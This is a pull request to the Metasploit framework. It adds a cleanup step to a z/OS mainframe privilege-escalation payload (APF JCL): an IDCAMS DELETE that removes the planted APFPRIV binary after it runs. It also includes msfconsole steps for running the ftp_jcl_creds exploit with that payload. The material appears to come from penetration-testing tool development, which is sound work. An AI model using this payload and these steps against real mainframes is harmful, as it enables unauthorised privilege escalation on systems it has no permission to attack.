### PR TITLE
Added to code to remove payload once run.

### DIFF
--- a/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb
+++ b/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb
@@ -23,7 +23,7 @@ require 'msf/base/sessions/mainframe_shell'
 require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
-  CachedSize = 3000
+  CachedSize = 3156
   include Msf::Payload::Single
   include Msf::Payload::Mainframe
 

--- a/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb
+++ b/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb
@@ -145,6 +145,12 @@ module MetasploitModule
       " SETR RACL(FACILITY) REF\n" \
       "/*\n" \
       "//SYSIN     DD DUMMY\n" \
-      "//SYSTSPRT  DD SYSOUT=*\n"
+      "//SYSTSPRT  DD SYSOUT=*\n" \
+      "//S3        EXEC PGM=IDCAMS\n" \
+      "//SYSPRINT  DD SYSOUT=*\n" \
+      "//TEMPDD    DD DSN=#{datastore['APFLIB']},DISP=SHR\n" \
+      "//SYSIN     DD *\n" \
+      " DELETE #{datastore['APFLIB']}(APFPRIV) FILE(TEMPDD)\n" \
+      "/*\n" \
   end
 end


### PR DESCRIPTION
The original payload left the binary behind on the system, which could be
then used by someone else intentionally or otherwise. This addition cleans 
up the module by removing it after running.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/mainframe/ftp/ftp_jcl_creds`
- [x] `set payload cmd/mainframe/apf_privesc_jcl`
- [x]  set other options including `APFLIB`
- [x] verify module doesn't exist prior (on Z)
- [x] run exploit
- [x] verify module does not exist after exploit

![image](https://user-images.githubusercontent.com/13771080/56978062-4a48b700-6b3c-11e9-90f7-f7fce651aa77.png)
![image](https://user-images.githubusercontent.com/13771080/56978112-63516800-6b3c-11e9-805a-5634c8e7b294.png)


